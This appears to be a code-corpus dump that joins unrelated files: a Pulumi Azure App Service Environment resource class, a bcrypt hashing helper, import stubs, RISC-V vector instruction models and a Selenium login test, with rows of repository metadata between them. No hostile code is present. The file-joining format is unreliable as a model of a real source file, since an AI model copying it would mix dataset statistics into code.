return pulumi.get(self, "pricing_tier")
@pricing_tier.setter
def pricing_tier(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "pricing_tier", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Resource Group where the App Service Environment exists. Defaults to the Resource Group of the Subnet (specified by `subnet_id`).
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Subnet which the App Service Environment should be connected to. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="windowsOutboundIpAddresses")
def windows_outbound_ip_addresses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Outbound addresses of Windows based Apps in this App Service Environment V3.
"""
return pulumi.get(self, "windows_outbound_ip_addresses")
@windows_outbound_ip_addresses.setter
def windows_outbound_ip_addresses(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "windows_outbound_ip_addresses", value)
@property
@pulumi.getter(name="zoneRedundant")
def zone_redundant(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "zone_redundant")
@zone_redundant.setter
def zone_redundant(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "zone_redundant", value)
class EnvironmentV3(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
allow_new_private_endpoint_connections: Optional[pulumi.Input[bool]] = None,
cluster_settings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EnvironmentV3ClusterSettingArgs']]]]] = None,
dedicated_host_count: Optional[pulumi.Input[int]] = None,
internal_load_balancing_mode: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
zone_redundant: Optional[pulumi.Input[bool]] = None,
__props__=None):
"""
Manages a 3rd Generation (v3) App Service Environment.
> **NOTE:** App Service Environment V3 is currently in Preview.
## Import
A 3rd Generation (v3) App Service Environment can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:appservice/environmentV3:EnvironmentV3 myAppServiceEnv /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/myResourceGroup/providers/Microsoft.Web/hostingEnvironments/myAppServiceEnv
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] allow_new_private_endpoint_connections: Should new Private Endpoint Connections be allowed. Defaults to `true`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EnvironmentV3ClusterSettingArgs']]]] cluster_settings: Zero or more `cluster_setting` blocks as defined below.
:param pulumi.Input[int] dedicated_host_count: This ASEv3 should use dedicated Hosts. Possible vales are `2`. Changing this forces a new resource to be created.
:param pulumi.Input[str] internal_load_balancing_mode: Specifies which endpoints to serve internally in the Virtual Network for the App Service Environment. Possible values are `None` (for an External VIP Type), and `"Web, Publishing"` (for an Internal VIP Type). Defaults to `None`.
:param pulumi.Input[str] name: The name of the App Service Environment. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the App Service Environment exists. Defaults to the Resource Group of the Subnet (specified by `subnet_id`).
:param pulumi.Input[str] subnet_id: The ID of the Subnet which the App Service Environment should be connected to. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource. Changing this forces a new resource to be created.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: EnvironmentV3Args,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a 3rd Generation (v3) App Service Environment.
> **NOTE:** App Service Environment V3 is currently in Preview.
## Import
A 3rd Generation (v3) App Service Environment can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:appservice/environmentV3:EnvironmentV3 myAppServiceEnv /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/myResourceGroup/providers/Microsoft.Web/hostingEnvironments/myAppServiceEnv
```
:param str resource_name: The name of the resource.
:param EnvironmentV3Args args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(EnvironmentV3Args, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
allow_new_private_endpoint_connections: Optional[pulumi.Input[bool]] = None,
cluster_settings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EnvironmentV3ClusterSettingArgs']]]]] = None,
dedicated_host_count: Optional[pulumi.Input[int]] = None,
internal_load_balancing_mode: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
zone_redundant: Optional[pulumi.Input[bool]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = EnvironmentV3Args.__new__(EnvironmentV3Args)
__props__.__dict__["allow_new_private_endpoint_connections"] = allow_new_private_endpoint_connections
__props__.__dict__["cluster_settings"] = cluster_settings
__props__.__dict__["dedicated_host_count"] = dedicated_host_count
__props__.__dict__["internal_load_balancing_mode"] = internal_load_balancing_mode
__props__.__dict__["name"] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if subnet_id is None and not opts.urn:
raise TypeError("Missing required property 'subnet_id'")
__props__.__dict__["subnet_id"] = subnet_id
__props__.__dict__["tags"] = tags
__props__.__dict__["zone_redundant"] = zone_redundant
__props__.__dict__["dns_suffix"] = None
__props__.__dict__["external_inbound_ip_addresses"] = None
__props__.__dict__["inbound_network_dependencies"] = None
__props__.__dict__["internal_inbound_ip_addresses"] = None
__props__.__dict__["ip_ssl_address_count"] = None
__props__.__dict__["linux_outbound_ip_addresses"] = None
__props__.__dict__["location"] = None
__props__.__dict__["pricing_tier"] = None
__props__.__dict__["windows_outbound_ip_addresses"] = None
super(EnvironmentV3, __self__).__init__(
'azure:appservice/environmentV3:EnvironmentV3',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
allow_new_private_endpoint_connections: Optional[pulumi.Input[bool]] = None,
cluster_settings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EnvironmentV3ClusterSettingArgs']]]]] = None,
dedicated_host_count: Optional[pulumi.Input[int]] = None,
dns_suffix: Optional[pulumi.Input[str]] = None,
external_inbound_ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
inbound_network_dependencies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EnvironmentV3InboundNetworkDependencyArgs']]]]] = None,
internal_inbound_ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
internal_load_balancing_mode: Optional[pulumi.Input[str]] = None,
ip_ssl_address_count: Optional[pulumi.Input[int]] = None,
linux_outbound_ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
pricing_tier: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
windows_outbound_ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
zone_redundant: Optional[pulumi.Input[bool]] = None) -> 'EnvironmentV3':
"""
Get an existing EnvironmentV3 resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] allow_new_private_endpoint_connections: Should new Private Endpoint Connections be allowed. Defaults to `true`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EnvironmentV3ClusterSettingArgs']]]] cluster_settings: Zero or more `cluster_setting` blocks as defined below.
:param pulumi.Input[int] dedicated_host_count: This ASEv3 should use dedicated Hosts. Possible vales are `2`. Changing this forces a new resource to be created.
:param pulumi.Input[str] dns_suffix: the DNS suffix for this App Service Environment V3.
:param pulumi.Input[Sequence[pulumi.Input[str]]] external_inbound_ip_addresses: The external outbound IP addresses of the App Service Environment V3.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EnvironmentV3InboundNetworkDependencyArgs']]]] inbound_network_dependencies: An Inbound Network Dependencies block as defined below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] internal_inbound_ip_addresses: The internal outbound IP addresses of the App Service Environment V3.
:param pulumi.Input[str] internal_load_balancing_mode: Specifies which endpoints to serve internally in the Virtual Network for the App Service Environment. Possible values are `None` (for an External VIP Type), and `"Web, Publishing"` (for an Internal VIP Type). Defaults to `None`.
:param pulumi.Input[int] ip_ssl_address_count: The number of IP SSL addresses reserved for the App Service Environment V3.
:param pulumi.Input[Sequence[pulumi.Input[str]]] linux_outbound_ip_addresses: Outbound addresses of Linux based Apps in this App Service Environment V3
:param pulumi.Input[str] location: The location where the App Service Environment exists.
:param pulumi.Input[str] name: The name of the App Service Environment. Changing this forces a new resource to be created.
:param pulumi.Input[str] pricing_tier: Pricing tier for the front end instances.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the App Service Environment exists. Defaults to the Resource Group of the Subnet (specified by `subnet_id`).
:param pulumi.Input[str] subnet_id: The ID of the Subnet which the App Service Environment should be connected to. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] windows_outbound_ip_addresses: Outbound addresses of Windows based Apps in this App Service Environment V3.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _EnvironmentV3State.__new__(_EnvironmentV3State)
__props__.__dict__["allow_new_private_endpoint_connections"] = allow_new_private_endpoint_connections
__props__.__dict__["cluster_settings"] = cluster_settings
__props__.__dict__["dedicated_host_count"] = dedicated_host_count
__props__.__dict__["dns_suffix"] = dns_suffix
__props__.__dict__["external_inbound_ip_addresses"] = external_inbound_ip_addresses
__props__.__dict__["inbound_network_dependencies"] = inbound_network_dependencies
__props__.__dict__["internal_inbound_ip_addresses"] = internal_inbound_ip_addresses
__props__.__dict__["internal_load_balancing_mode"] = internal_load_balancing_mode
__props__.__dict__["ip_ssl_address_count"] = ip_ssl_address_count
__props__.__dict__["linux_outbound_ip_addresses"] = linux_outbound_ip_addresses
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
__props__.__dict__["pricing_tier"] = pricing_tier
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["subnet_id"] = subnet_id
__props__.__dict__["tags"] = tags
__props__.__dict__["windows_outbound_ip_addresses"] = windows_outbound_ip_addresses
__props__.__dict__["zone_redundant"] = zone_redundant
return EnvironmentV3(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="allowNewPrivateEndpointConnections")
def allow_new_private_endpoint_connections(self) -> pulumi.Output[Optional[bool]]:
"""
Should new Private Endpoint Connections be allowed. Defaults to `true`.
"""
return pulumi.get(self, "allow_new_private_endpoint_connections")
@property
@pulumi.getter(name="clusterSettings")
def cluster_settings(self) -> pulumi.Output[Sequence['outputs.EnvironmentV3ClusterSetting']]:
"""
Zero or more `cluster_setting` blocks as defined below.
"""
return pulumi.get(self, "cluster_settings")
@property
@pulumi.getter(name="dedicatedHostCount")
def dedicated_host_count(self) -> pulumi.Output[Optional[int]]:
"""
This ASEv3 should use dedicated Hosts. Possible vales are `2`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "dedicated_host_count")
@property
@pulumi.getter(name="dnsSuffix")
def dns_suffix(self) -> pulumi.Output[str]:
"""
the DNS suffix for this App Service Environment V3.
"""
return pulumi.get(self, "dns_suffix")
@property
@pulumi.getter(name="externalInboundIpAddresses")
def external_inbound_ip_addresses(self) -> pulumi.Output[Sequence[str]]:
"""
The external outbound IP addresses of the App Service Environment V3.
"""
return pulumi.get(self, "external_inbound_ip_addresses")
@property
@pulumi.getter(name="inboundNetworkDependencies")
def inbound_network_dependencies(self) -> pulumi.Output[Sequence['outputs.EnvironmentV3InboundNetworkDependency']]:
"""
An Inbound Network Dependencies block as defined below.
"""
return pulumi.get(self, "inbound_network_dependencies")
@property
@pulumi.getter(name="internalInboundIpAddresses")
def internal_inbound_ip_addresses(self) -> pulumi.Output[Sequence[str]]:
"""
The internal outbound IP addresses of the App Service Environment V3.
"""
return pulumi.get(self, "internal_inbound_ip_addresses")
@property
@pulumi.getter(name="internalLoadBalancingMode")
def internal_load_balancing_mode(self) -> pulumi.Output[Optional[str]]:
"""
Specifies which endpoints to serve internally in the Virtual Network for the App Service Environment. Possible values are `None` (for an External VIP Type), and `"Web, Publishing"` (for an Internal VIP Type). Defaults to `None`.
"""
return pulumi.get(self, "internal_load_balancing_mode")
@property
@pulumi.getter(name="ipSslAddressCount")
def ip_ssl_address_count(self) -> pulumi.Output[int]:
"""
The number of IP SSL addresses reserved for the App Service Environment V3.
"""
return pulumi.get(self, "ip_ssl_address_count")
@property
@pulumi.getter(name="linuxOutboundIpAddresses")
def linux_outbound_ip_addresses(self) -> pulumi.Output[Sequence[str]]:
"""
Outbound addresses of Linux based Apps in this App Service Environment V3
"""
return pulumi.get(self, "linux_outbound_ip_addresses")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
The location where the App Service Environment exists.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the App Service Environment. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="pricingTier")
def pricing_tier(self) -> pulumi.Output[str]:
"""
Pricing tier for the front end instances.
"""
return pulumi.get(self, "pricing_tier")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the Resource Group where the App Service Environment exists. Defaults to the Resource Group of the Subnet (specified by `subnet_id`).
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> pulumi.Output[str]:
"""
The ID of the Subnet which the App Service Environment should be connected to. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="windowsOutboundIpAddresses")
def windows_outbound_ip_addresses(self) -> pulumi.Output[Sequence[str]]:
"""
Outbound addresses of Windows based Apps in this App Service Environment V3.
"""
return pulumi.get(self, "windows_outbound_ip_addresses")
@property
@pulumi.getter(name="zoneRedundant")
def zone_redundant(self) -> pulumi.Output[Optional[bool]]:
return pulumi.get(self, "zone_redundant")
| 53.923761
| 291
| 0.696899
| 5,106
| 42,438
| 5.535253
| 0.048962
| 0.088349
| 0.074621
| 0.030252
| 0.922372
| 0.902275
| 0.878074
| 0.861763
| 0.84347
| 0.805718
| 0
| 0.0047
| 0.207809
| 42,438
| 786
| 292
| 53.992366
| 0.835986
| 0.323248
| 0
| 0.684211
| 1
| 0
| 0.151143
| 0.091144
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166316
| false
| 0.002105
| 0.014737
| 0.006316
| 0.284211
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
78eff3d7c52b09cbd98146b1731f20c92237288b
| 215
|
py
|
Python
|
em2/auth/utils.py
|
samuelcolvin/em2
|
a587eaa80c09a2b44d9c221d09a563aad5b05d78
|
[
"MIT"
] | 5
|
2019-03-20T19:07:45.000Z
|
2020-10-03T01:16:05.000Z
|
em2/auth/utils.py
|
samuelcolvin/em2
|
a587eaa80c09a2b44d9c221d09a563aad5b05d78
|
[
"MIT"
] | 51
|
2019-03-12T16:19:46.000Z
|
2021-03-09T00:52:24.000Z
|
em2/auth/utils.py
|
samuelcolvin/em2
|
a587eaa80c09a2b44d9c221d09a563aad5b05d78
|
[
"MIT"
] | 1
|
2019-05-31T14:41:18.000Z
|
2019-05-31T14:41:18.000Z
|
import bcrypt
from em2.settings import Settings
def mk_password(password: str, settings: Settings) -> str:
return bcrypt.hashpw(password.encode(), bcrypt.gensalt(rounds=settings.bcrypt_work_factor)).decode()
| 26.875
| 104
| 0.781395
| 28
| 215
| 5.892857
| 0.607143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005208
| 0.106977
| 215
| 7
| 105
| 30.714286
| 0.854167
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.5
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 0
|
0
| 7
|
6009f000814753ab436278e2d2cc38e961e80f3f
| 118
|
py
|
Python
|
networkx/algorithms/link_analysis/__init__.py
|
marscher/networkx
|
2b01a30d6967cc94a0f8caca2252bce7817b2b1c
|
[
"BSD-3-Clause"
] | 2
|
2022-01-19T02:07:57.000Z
|
2022-01-20T16:22:15.000Z
|
networkx/algorithms/link_analysis/__init__.py
|
Reed-CompBio/networkx
|
c266c4b29699290333dff5440e3c9e3029ec0341
|
[
"BSD-3-Clause"
] | null | null | null |
networkx/algorithms/link_analysis/__init__.py
|
Reed-CompBio/networkx
|
c266c4b29699290333dff5440e3c9e3029ec0341
|
[
"BSD-3-Clause"
] | 1
|
2022-02-03T09:38:16.000Z
|
2022-02-03T09:38:16.000Z
|
from networkx.algorithms.link_analysis.hits_alg import *
from networkx.algorithms.link_analysis.pagerank_alg import *
| 39.333333
| 60
| 0.864407
| 16
| 118
| 6.125
| 0.5625
| 0.244898
| 0.44898
| 0.530612
| 0.693878
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.067797
| 118
| 2
| 61
| 59
| 0.890909
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
60207f8a49b47fbcf85522f04e9cb01dce580ee8
| 95
|
py
|
Python
|
src/python/math_fun/lib/math.py
|
jaximan/pexample
|
8820e82b01b4ef84746351ddf2e1c8af1ff6b0a1
|
[
"Apache-2.0"
] | 17
|
2017-12-28T18:05:53.000Z
|
2022-03-07T09:45:40.000Z
|
src/python/math_fun/lib/math.py
|
jaximan/pexample
|
8820e82b01b4ef84746351ddf2e1c8af1ff6b0a1
|
[
"Apache-2.0"
] | null | null | null |
src/python/math_fun/lib/math.py
|
jaximan/pexample
|
8820e82b01b4ef84746351ddf2e1c8af1ff6b0a1
|
[
"Apache-2.0"
] | 2
|
2017-12-28T17:14:17.000Z
|
2020-03-25T17:46:37.000Z
|
import numpy as np
def random_sum(*dimensions):
return np.random.rand(*dimensions).sum()
| 15.833333
| 44
| 0.726316
| 14
| 95
| 4.857143
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.147368
| 95
| 5
| 45
| 19
| 0.839506
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
605d3355ade13da0e6d1e8abca4f445efda9ee05
| 115
|
py
|
Python
|
labelbox/data/annotation_types/data/__init__.py
|
nickaustinlee/labelbox-python
|
45eb808165849e5a55fb6869ca5cc415d74772ce
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
labelbox/data/annotation_types/data/__init__.py
|
nickaustinlee/labelbox-python
|
45eb808165849e5a55fb6869ca5cc415d74772ce
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
labelbox/data/annotation_types/data/__init__.py
|
nickaustinlee/labelbox-python
|
45eb808165849e5a55fb6869ca5cc415d74772ce
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
from .raster import ImageData
from .raster import MaskData
from .text import TextData
from .video import VideoData
| 23
| 29
| 0.826087
| 16
| 115
| 5.9375
| 0.5625
| 0.210526
| 0.336842
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.13913
| 115
| 4
| 30
| 28.75
| 0.959596
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
606a151c1009f225adc5aacf1ad386960edc6735
| 329
|
py
|
Python
|
icontact/tests/__init__.py
|
rochapps/django-icontact
|
ba50b5a66d6ed179793fb460ee6cf4d242d46276
|
[
"BSD-3-Clause"
] | 1
|
2015-03-31T14:33:06.000Z
|
2015-03-31T14:33:06.000Z
|
icontact/tests/__init__.py
|
rochapps/django-icontact
|
ba50b5a66d6ed179793fb460ee6cf4d242d46276
|
[
"BSD-3-Clause"
] | null | null | null |
icontact/tests/__init__.py
|
rochapps/django-icontact
|
ba50b5a66d6ed179793fb460ee6cf4d242d46276
|
[
"BSD-3-Clause"
] | null | null | null |
from icontact.tests.client import IContactClientTests
from icontact.tests.adapter import IContactDataTests
from icontact.tests.adapter import IContactAdapterTests
from icontact.tests.models import IContactManagerTests
from icontact.tests.models import IContactModelTests
from icontact.tests.observer import IContactObserverTests
| 47
| 57
| 0.890578
| 36
| 329
| 8.138889
| 0.388889
| 0.245734
| 0.348123
| 0.163823
| 0.40273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.072948
| 329
| 6
| 58
| 54.833333
| 0.960656
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
608d5ce46221662958076af811b187e85685de12
| 1,581
|
py
|
Python
|
rvpvp/isa/rvv/vmxxx_vvm.py
|
ultrafive/riscv-pvp
|
843e38422c3d545352b955764927d5e7847e5453
|
[
"Unlicense"
] | 5
|
2021-05-10T09:57:00.000Z
|
2021-10-05T14:39:20.000Z
|
rvpvp/isa/rvv/vmxxx_vvm.py
|
ultrafive/riscv-pvp
|
843e38422c3d545352b955764927d5e7847e5453
|
[
"Unlicense"
] | null | null | null |
rvpvp/isa/rvv/vmxxx_vvm.py
|
ultrafive/riscv-pvp
|
843e38422c3d545352b955764927d5e7847e5453
|
[
"Unlicense"
] | 1
|
2021-05-14T20:24:11.000Z
|
2021-05-14T20:24:11.000Z
|
from ...isa.inst import *
import numpy as np
class Vmadc_vvm(Inst):
name = 'vmadc.vvm'
# vmadc.vvm vd, vs2, vs1, v0
def golden(self):
if self['vl']==0:
return self['ori']
if self['ori'].dtype != np.uint8:
self['ori'].dtype = np.uint8
bit = np.unpackbits(self['ori'], bitorder='little')[0:8*self['bvl']]
print("bit = "+str(bit))
mask = np.unpackbits(self['mask'],bitorder='little')
vstart = self['vstart'] if 'vstart' in self else 0
for ii in range(vstart, self['vl']):
carry = self['vs2'][ii].astype(object) + self['vs1'][ii].astype(object) + mask[ii].astype(object)
bit[ii] = 1 if ((carry>>self['sew']) & 1) else 0
result = np.packbits(bit, bitorder='little')
return result
class Vmsbc_vvm(Inst):
name = 'vmsbc.vvm'
# vmsbc.vvm vd, vs2, vs1, v0
def golden(self):
if self['vl']==0:
return self['ori']
if self['ori'].dtype != np.uint8:
self['ori'].dtype = np.uint8
bit = np.unpackbits(self['ori'], bitorder='little')[0:8*self['bvl']]
mask = np.unpackbits(self['mask'],bitorder='little')
vstart = self['vstart'] if 'vstart' in self else 0
for ii in range(vstart, self['vl']):
carry = self['vs2'][ii].astype(object) - self['vs1'][ii].astype(object) - mask[ii].astype(object)
bit[ii] = 1 if ((carry>>self['sew']) & 1) else 0
result = np.packbits(bit, bitorder='little')
return result
| 40.538462
| 110
| 0.536369
| 214
| 1,581
| 3.953271
| 0.224299
| 0.066194
| 0.099291
| 0.066194
| 0.865248
| 0.865248
| 0.865248
| 0.865248
| 0.865248
| 0.865248
| 0
| 0.02467
| 0.2821
| 1,581
| 38
| 111
| 41.605263
| 0.720705
| 0.034788
| 0
| 0.727273
| 0
| 0
| 0.097304
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.060606
| false
| 0
| 0.060606
| 0
| 0.363636
| 0.030303
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
609d48ef9cbb96154eaf89ea87cde1b7e4a94abf
| 11,743
|
py
|
Python
|
tests/test_gui.py
|
COE420Group4/Donation-Nation
|
58d62bc3a28aba0ce2b484ad68329ac0bd0680f2
|
[
"MIT"
] | null | null | null |
tests/test_gui.py
|
COE420Group4/Donation-Nation
|
58d62bc3a28aba0ce2b484ad68329ac0bd0680f2
|
[
"MIT"
] | null | null | null |
tests/test_gui.py
|
COE420Group4/Donation-Nation
|
58d62bc3a28aba0ce2b484ad68329ac0bd0680f2
|
[
"MIT"
] | null | null | null |
import pytest
import time
import json
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.chrome.options import Options
import sys # ! Don't remove this line.
sys.path.append('.')
from db import DB
# * This is a suite of tests to test functionality that relates to the GUI (alerts exists, buttons are clickable, etc)
class TestGUI():
def setup_method(self, method):
self.sql = DB()
self.sql.clear_db()
self.sql.init_db()
self.sql.populate()
chrome_options = Options()
chrome_options.add_argument("--headless")
self.driver = webdriver.Chrome(options=chrome_options)
self.vars = {}
def teardown_method(self, method):
self.driver.quit()
# * User login
def test_user_valid_credentials(self):
self.driver.get("http://127.0.0.1:5000/")
self.driver.set_window_size(1200, 1000)
self.driver.find_element(By.ID, "loginButton").click()
self.driver.find_element(By.CSS_SELECTOR, ".col-4:nth-child(1) .img-fluid").click()
self.driver.find_element(By.ID, "exampleInputEmail1").send_keys("donald@email.com")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys("a")
self.driver.find_element(By.CSS_SELECTOR, ".btn-primary").click()
assert 'Dashboard' in self.driver.title
